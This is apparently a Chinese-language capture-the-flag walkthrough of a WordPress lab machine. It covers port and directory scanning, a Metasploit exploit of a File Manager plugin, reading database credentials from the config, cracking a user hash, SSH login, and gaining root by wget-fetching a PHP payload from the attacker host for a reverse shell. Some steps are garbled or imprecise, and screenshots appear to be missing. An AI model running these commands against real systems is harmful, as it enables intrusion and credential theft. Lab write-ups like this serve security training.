靶机ip:192.168.181.145
kali ip: 192.168.181.129
首先进行ip扫描
打开网页进行查看
?查看开启哪些端口
nmap -sC -sV 192.168.181.145 --min-rate=2000 -d
?对目录进行扫描
?打开/blog页面
?发现notice无法进行跳转,修改/etc/hosts文件
?然后在kali打开
?用wpscan进行扫描
?
?发现有File Manager的漏洞于是打开msfcondole
?使用第二个,并进行相应的配置
?运行,可以获得shell
?
?python3 -c 'import pty;pty.spawn("/bin/bash")'
可以获得shell
?d98发现了一个bese64的编码的一段文字
这是翻译后的结果:1: RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets,翻译为 1:里德尔的日记在《密室》中被哈利毁掉
于是我们查找所有带有wordpress的目录名
find / -type d -name "wordpress" 2>/dev/null
?我们查看到了所有数据库用户名和密码
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'mySecr3tPass');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/usr/share/wordpress/wp-content');于是进行爆破
爆破失败
我们进入到mysql,上面给了我们用户名和密码
在wordpress找到了密码$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc.
select * from wp_users
对其进行MD5解码
password123
?
?于是进行ssh登录
登录成功
进行提权
看看能否使用sudo提权
find / -perm -u=s -type f 2>/dev/null
没有可以利用的
于是查看是否有脚本
find / -name "*back*"
?发现一个备份文件,于是进行查看
他告诉我们要在tmp下创建一个upload,获取权限
在kali端开启web服务
?wget http://192.168.181.129:8888/11.php
?将php文件下载到/tmp下
?在kali端进行监听
?
?稍等片刻后可以获得root权限
?于是获得最终的flag
?